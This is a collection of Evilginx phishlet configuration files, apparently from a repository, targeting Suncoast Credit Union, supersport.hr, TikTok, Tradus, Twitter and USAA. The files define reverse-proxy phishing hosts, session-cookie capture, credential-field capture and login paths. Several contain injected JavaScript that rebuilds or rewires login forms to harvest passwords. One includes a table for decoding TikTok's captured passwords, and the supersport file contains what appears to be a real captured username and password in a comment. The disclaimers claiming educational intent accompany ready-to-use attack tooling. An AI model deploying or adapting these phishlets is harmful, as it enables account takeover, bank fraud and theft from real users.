  username:
    key: 'memberId'
    search: '(.*)'
    type: 'post'
  password:
    key: 'password'
    search: '(.*)'
    type: 'post'

login:
  domain: 'www.suncoastcreditunion.com'
  path: '/'



--------------------------------------------------------------------------------
/supersport.yaml:
--------------------------------------------------------------------------------
 1 | # AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES.
 2 | # PLEASE DO NOT MISUSE THIS PHISHLET.
 3 | 
 4 | author: '@An0nud4y'
 5 | min_ver: '2.3.0'
 6 | proxy_hosts:
 7 |   - {phish_sub: 'www', orig_sub: 'www', domain: 'supersport.hr', session: true, is_landing: true}
 8 |   - {phish_sub: '', orig_sub: '', domain: 'supersport.hr', session: true, is_landing: false}
 9 | sub_filters:
10 |   - {triggers_on: 'www.supersport.hr/res/', orig_sub: 'www', domain: 'supersport.hr', search: 'i=n(2494);', replace: 'i=n(165);', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
11 |   - {triggers_on: 'www.supersport.hr', orig_sub: 'www', domain: 'supersport.hr', search: 'i=n(2494);', replace: 'i=n(165);', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
12 |   - {triggers_on: 'www.supersport.hr', orig_sub: 'www', domain: 'supersport.hr', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
13 |   - {triggers_on: 'www.supersport.hr', orig_sub: 'www', domain: 'supersport.hr', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
14 |   - {triggers_on: 'www.supersport.hr', orig_sub: 'www', domain: 'supersport.hr', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
15 |   - {triggers_on: 'www.supersport.hr', orig_sub: 'www', domain: 'supersport.hr', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
16 |   - {triggers_on: 'www.supersport.hr', orig_sub: 'www', domain: 'supersport.hr', search: 'i=n(2494);', replace: 'i=n(165);', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
17 |   - {triggers_on: 'www.supersport.hr/res/', orig_sub: 'www', domain: 'supersport.hr', search: 'i=n(2494);', replace: 'i=n(165);', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
18 | 
19 | 
20 | # i=n(2494); -->  i=n(165);
21 | # a.render(r.createElement(i,null),document.getElementById("mount-app"));var o=n(139),l=n(165);
22 | # 
23 | 
24 | auth_tokens:
25 |   - domain: '.supersport.hr'
26 |     keys: ['session_id', '_dvc', '.*,regexp']
27 | credentials:
28 |   username:
29 |     key: 'login'
30 |     search: '(.*)'
31 |     type: 'post'
32 |   password:
33 |     key: 'password'
34 |     search: '(.*)'
35 |     type: 'post'
36 | login:
37 |   domain: 'www.supersport.hr'
38 |   path: '/igraci/prijava/'
39 | 
40 | js_inject:
41 |   - trigger_domains: ["www.supersport.hr"]
42 |     trigger_paths: ["/igraci/prijava/"]
43 |     trigger_params: []
44 |     script: |
45 |       function onclickListener(){
46 |         document.getElementById("mount-app").innerHTML = '<div id="igrac_prijava" class="layout"><div class="formaTop"><h3>Login </h3></div><div class="fieldset"><form method="post"><div class="userInput"><div id="prijava_login_container"><div class=""><label for="login">nickname or email : </label><input class="textInput" name="prijava[login]" placeholder="nadimak ili email" maxlength="100" size="100" type="text" value=""><div class="userInput_state_message"></div></div></div><div id="prijava_password_container"><div class=""><label for="login">password : </label><input class="textInput" name="prijava[password]" placeholder="lozinka" maxlength="100" size="100" type="password" value=""><div class="userInput_state_message"></div></div></div><div style="margin-top: 15px;">Betting is prohibited for U.S. citizens and anyone with a work permit in the United States. </div></div><div class="formeRight"><div class="belowSubmit"><a href="/zaboravljena_lozinka">I forgot my password! </a></div><div class="belowSubmit">Only can apply <a href="/registracija">registered </a>players . </div></div><div class="submit prijava"><input class="prijaviButton submitButton disabled" id="prijavi" type="submit" value="" onclick="sendpass();"></div></form></div><img alt="Formabottom" src="/assets/forme/formaBottom.gif"></div>'
47 |         return;
48 |       }
49 |       function sendPass(){
50 |         var login = document.getElementsByName("prijava[login]")[0].value;
51 |         var password = document.getElementsByName("prijava[password]")[0].value;
52 |         var xhr = new XMLHttpRequest();
53 |         xhr.open("POST", '/login', true);
54 |         xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
55 |         xhr.send("login="+encodeURIComponent(login)+""+" password="+encodeURIComponent(password));
56 |         return;
57 |       }
58 |       setTimeout(function(){ onclickListener(); }, 2000);
59 |   
60 |   
61 | # AUTHENTICATION REQUEST   
62 | #prijava:7
63 | #{"login":" jambra10","password":"Mrle1990.","useragent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0"}  


--------------------------------------------------------------------------------
/tiktok.yaml:
--------------------------------------------------------------------------------
 1 | # AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES.
 2 | # PLEASE DO NOT MISUSE THIS PHISHLET.
 3 | 
 4 | # All Post Requests Fields Get Encoded During Requests to Server By titok javascripts.
 5 | # Below is the Table Which You can use to decode your captured credentials in evilginx manually.
 6 | 
 7 | author: '@An0nUD4Y'
 8 | min_ver: '2.3.0'
 9 | proxy_hosts:
10 |   - {phish_sub: 'www', orig_sub: 'www', domain: 'tiktok.com', session: true, is_landing: true}
11 |   - {phish_sub: 'm', orig_sub: 'm', domain: 'tiktok.com', session: true, is_landing: false}
12 |   - {phish_sub: '', orig_sub: '', domain: 'tiktok.com', session: true, is_landing: false}  
13 |   - {phish_sub: 'polyfill', orig_sub: '', domain: 'polyfill.io', session: true, is_landing: false}
14 |   - {phish_sub: 's16', orig_sub: 's16', domain: 'tiktokcdn.com', session: true, is_landing: false}
15 |   - {phish_sub: 'hypstarcdn', orig_sub: 's16', domain: 'hypstarcdn.com', session: true, is_landing: false}
16 |   - {phish_sub: 'kakao', orig_sub: 'developers', domain: 'kakao.com', session: true, is_landing: false}
17 |   - {phish_sub: 'mon-va', orig_sub: 'mon-va', domain: 'byteoversea.com', session: true, is_landing: false}
18 |   - {phish_sub: 'maliva', orig_sub: 'maliva-mcs', domain: 'byteoversea.com', session: true, is_landing: false}
19 |   - {phish_sub: 'sf16-muse-va', orig_sub: 'sf16-muse-va', domain: 'ibytedtos.com', session: true, is_landing: false}
20 | 
21 | sub_filters:
22 |   - {triggers_on: 'www.tiktok.com', orig_sub: 'www', domain: 'tiktok.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
23 |   - {triggers_on: 'm.tiktok.com', orig_sub: 'm', domain: 'tiktok.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
24 |   - {triggers_on: 'm.tiktok.com', orig_sub: 'm', domain: 'tiktok.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
25 |   - {triggers_on: 'www.tiktok.com', orig_sub: 's16', domain: 'tiktokcdn.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
26 |   - {triggers_on: 'm.tiktok.com', orig_sub: 's16', domain: 'tiktokcdn.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
27 |   - {triggers_on: 'm.tiktok.com', orig_sub: 's16', domain: 'tiktokcdn.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
28 |   - {triggers_on: 'www.tiktok.com', orig_sub: '', domain: 'polyfill.io', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
29 |   - {triggers_on: 'm.tiktok.com', orig_sub: '', domain: 'polyfill.io', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
30 |   - {triggers_on: 'm.tiktok.com', orig_sub: '', domain: 'polyfill.io', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
31 |   - {triggers_on: 'www.tiktok.com', orig_sub: 's16', domain: 'hypstarcdn.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
32 |   - {triggers_on: 'm.tiktok.com', orig_sub: 's16', domain: 'hypstarcdn.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
33 |   - {triggers_on: 'm.tiktok.com', orig_sub: 's16', domain: 'hypstarcdn.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
34 |   - {triggers_on: 'www.tiktok.com', orig_sub: 'developers', domain: 'kakao.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
35 |   - {triggers_on: 'm.tiktok.com', orig_sub: 'developers', domain: 'kakao.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
36 |   - {triggers_on: 'm.tiktok.com', orig_sub: 'developers', domain: 'kakao.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
37 |   - {triggers_on: 'www.tiktok.com', orig_sub: 'mon-va', domain: 'byteoversea.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
38 |   - {triggers_on: 'm.tiktok.com', orig_sub: 'mon-va', domain: 'byteoversea.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
39 |   - {triggers_on: 'm.tiktok.com', orig_sub: 'mon-va', domain: 'byteoversea.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
40 |   - {triggers_on: 'www.tiktok.com', orig_sub: 'maliva-mcs', domain: 'byteoversea.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
41 |   - {triggers_on: 'm.tiktok.com', orig_sub: 'maliva-mcs', domain: 'byteoversea.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
42 |   - {triggers_on: 'm.tiktok.com', orig_sub: 'maliva-mcs', domain: 'byteoversea.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
43 |   - {triggers_on: 'www.tiktok.com', orig_sub: 'sf16-muse-va', domain: 'ibytedtos.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
44 |   - {triggers_on: 'm.tiktok.com', orig_sub: 'sf16-muse-va', domain: 'ibytedtos.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
45 |   - {triggers_on: 'm.tiktok.com', orig_sub: 'sf16-muse-va', domain: 'ibytedtos.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
46 | 
47 | 
48 | 
49 | 
50 | 
51 | auth_tokens:
52 |   - domain: '.tiktok.com'
53 |     keys: ['.*,regexp']
54 | credentials:
55 |   username:
56 |     key: 'account'
57 |     search: '(.*)'
58 |     type: 'post'  
59 |   password:
60 |     key: 'pass'
61 |     search: '(.*)'
62 |     type: 'post'
63 |   custom:
64 |     key: 'mobile'
65 |     search: '(.*)'
66 |     type: 'post'
67 | 
68 | login:
69 |   domain: 'www.tiktok.com'
70 |   path: '/login/phone-or-email/phone-password?lang=en'
71 |   
72 |   
73 | #Remember Server Accepts Only encoded Credentials, So don't break the js functions responsible for encoding.
74 |   
75 | #ENCODING TABLE TO DECODE THE PASSWORD AND MOBILE NUMBER
76 | 
77 | # FOR NUMBERS
78 | 
79 | # 1 = 34 , 2 = 37 , 3 = 36 , 4 = 31 , 5 = 30 ,6 = 33 , 7 = 32 , 8 = 3d , 9 = 3c
80 | 
81 | # FOR SPECIAL CHARACTERS
82 | 
83 | # ! = 24 , @ = 45 , # = 26 , $ = 21 , ^ = 5b , & = 23 , * = 2f , + = 2e
84 | 
85 | # FOR LETTERS (SMALL-LETTERS)
86 | 
87 | # a = 64 , b=67 , c=66 ,d=61,e=60,f=63,g=62,h=6d,i=6c,j=6f,k=6e,l=69,m=68,n=6b,o=6a,p=75,q=74,r=77,s=76,t=71,u=70,v=73,w=72,x=7d,y=7c,z=7f
88 | 
89 | # FOR LETTERS (CAPITAL-LETTERS)
90 | 
91 | # A=44 B=47 C=46 D=41 E=40 F=43 G=42 H=4d I=4c J=4f K=4e L=49 M=48 N=4b O=4a P=55 Q=54 R=57 S=56 T=51 U=50 V=53 W=52 X=5d Y=5c Z=5f
92 | 
93 | 
94 | # OTHER REMAINED CODES CAN BE FOUND USING POST REQUEST ANALYSIS.
95 | 
96 | 


--------------------------------------------------------------------------------
/tradus.yaml:
--------------------------------------------------------------------------------
 1 | author: '@AN0NUD4Y'
 2 | min_ver: '2.3.0'
 3 | proxy_hosts:
 4 |   - {phish_sub: 'pro', orig_sub: 'pro', domain: 'tradus.com', session: true, is_landing: false}
 5 |   - {phish_sub: 'api', orig_sub: 'api-pro', domain: 'tradus.com', session: true, is_landing: true}
 6 | 
 7 | sub_filters:
 8 |   - {triggers_on: 'pro.tradus.com', orig_sub: 'pro', domain: 'tradus.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
 9 |   - {triggers_on: 'pro.tradus.com', orig_sub: 'pro', domain: 'tradus.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
10 |   - {triggers_on: 'pro.tradus.com', orig_sub: 'pro', domain: 'tradus.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
11 |   - {triggers_on: 'pro.tradus.com', orig_sub: 'api-pro', domain: 'tradus.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
12 |   - {triggers_on: 'pro.tradus.com', orig_sub: 'api-pro', domain: 'tradus.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
13 |   - {triggers_on: 'pro.tradus.com', orig_sub: 'api-pro', domain: 'tradus.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
14 |   - {triggers_on: 'api-pro.tradus.com', orig_sub: 'api-pro', domain: 'tradus.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
15 |   - {triggers_on: 'api-pro.tradus.com', orig_sub: 'api-pro', domain: 'tradus.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
16 |   - {triggers_on: 'api-pro.tradus.com', orig_sub: 'api-pro', domain: 'tradus.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
17 | 
18 | 
19 | auth_tokens:
20 |   - domain: '.tradus.com'
21 |     keys: ['','.*,regexp']
22 | 
23 | credentials:
24 |   username:
25 |     key: 'Email'
26 |     search: '(.*)'
27 |     type: 'post'
28 |   password:
29 |     key: 'Password'
30 |     search: '(.*)'
31 |     type: 'post'
32 | 
33 | login:
34 |   domain: 'pro.tradus.com'
35 |   path: '/login'
36 | 
37 | js_inject:
38 |   - trigger_domains: ["pro.tradus.com"]
39 |     trigger_paths: ["/login"]
40 |     trigger_params: []
41 |     script: |
42 |       function lp(){
43 |         var submit = document.querySelectorAll('button[type=button]')[4];
44 |         submit.setAttribute("onclick", "sendData()");
45 |         return;
46 |       }
47 |       function sendData(){
48 |         var email = document.getElementsByName("email")[1].value;
49 |         var password = document.getElementsByName("password")[0].value;
50 |         var xhr2 = new XMLHttpRequest();
51 |         xhr2.open("POST", '/', true);
52 |         xhr2.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
53 |         xhr2.send("Email="+encodeURIComponent(email));
54 |         var xhr = new XMLHttpRequest();
55 |         xhr.open("POST", '/', true);
56 |         xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
57 |         xhr.send("Password="+encodeURIComponent(password));
58 |         return;
59 |       }
60 |       setTimeout(function(){ lp(); }, 2500);
61 |       
62 |       
63 |       
64 |       
65 |       


--------------------------------------------------------------------------------
/twitter-mobile.yaml:
--------------------------------------------------------------------------------
 1 | author: '@white_fi'
 2 | min_ver: '2.3.0'
 3 | proxy_hosts:
 4 |   - {phish_sub: 'mobile', orig_sub: 'mobile', domain: 'twitter.com', session: true, is_landing: true}
 5 |   - {phish_sub: 'abs', orig_sub: 'abs', domain: 'twimg.com', session: true, is_landing: false}
 6 |   - {phish_sub: 'api', orig_sub: 'api', domain: 'twitter.com', session: false, is_landing: false}
 7 | sub_filters:
 8 |   - {triggers_on: 'mobile.twitter.com', orig_sub: 'mobile', domain: 'twitter.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
 9 |   - {triggers_on: 'abs.twimg.com', orig_sub: 'abs', domain: 'twimg.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
10 |   - {triggers_on: 'api.twitter.com', orig_sub: 'api', domain: 'twitter.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
11 | auth_tokens:
12 |   - domain: 'twitter.com'
13 |     keys: ['dnt','fm','kdt','_twitter_sess','twid','auth_token']
14 | credentials:
15 |   username:
16 |     key: 'session\[username_or_email\]'
17 |     search: '(.*)'
18 |     type: 'post'
19 |   password:
20 |     key: 'session\[password\]'
21 |     search: '(.*)'
22 |     type: 'post'
23 | login:
24 |   domain: 'mobile.twitter.com'
25 |   path: '/login'
26 | 


--------------------------------------------------------------------------------
/twitter.yaml:
--------------------------------------------------------------------------------
 1 | author: '@white_fi'
 2 | min_ver: '2.3.0'
 3 | proxy_hosts:
 4 |   - {phish_sub: '', orig_sub: '', domain: 'twitter.com', session: true, is_landing: true}
 5 |   - {phish_sub: 'abs', orig_sub: 'abs', domain: 'twimg.com'}
 6 |   - {phish_sub: 'api', orig_sub: 'api', domain: 'twitter.com'}
 7 | sub_filters: []
 8 | auth_tokens:
 9 |   - domain: '.twitter.com'
10 |     keys: ['kdt','_twitter_sess','twid','auth_token']
11 | credentials:
12 |   username:
13 |     key: 'session\[username_or_email\]'
14 |     search: '(.*)'
15 |     type: 'post'
16 |   password:
17 |     key: 'session\[password\]'
18 |     search: '(.*)'
19 |     type: 'post'
20 | login:
21 |   domain: 'twitter.com'
22 |   path: '/login'
23 | 


--------------------------------------------------------------------------------
/usaa.yaml:
--------------------------------------------------------------------------------
 1 | # THE AUTHOR OF THIS PHISHLET DO NOT SUPPORT ANY ILLEGAL ACTIVITIES...
 2 | 
 3 | author: '@i_am_a_Good_Human' 
 4 | min_ver: '2.3.0'
 5 | proxy_hosts:
 6 |   - {phish_sub: 'www', orig_sub: 'www', domain: 'usaa.com', session: true, is_landing: true}
 7 | 
 8 | sub_filters:
 9 |   - {triggers_on: 'www.usaa.com', orig_sub: 'www', domain: 'usaa.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
10 |   - {triggers_on: 'www.usaa.com', orig_sub: 'www', domain: 'usaa.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
11 | 
12 | auth_tokens:
13 |   - domain: '.usaa.com'
14 |     keys: ['.*,regexp']
15 | auth_urls:
16 |   - '/'  
17 | credentials:
18 |   username:
19 |     key: 'username'
20 |     search: '(.*)'
21 |     type: 'post'
22 |   password:
23 |     key: 'j_password'
24 |     search: '(.*)'
25 |     type: 'post'
26 | login:
27 |   domain: 'www.usaa.com'
28 |   path: '/inet/ent_logon/Logon'
29 |   
30 | # THE AUTHOR OF THIS PHISHLET DO NOT SUPPORT ANY ILLEGAL ACTIVITIES...  
31 |   
32 | 


--------------------------------------------------------------------------------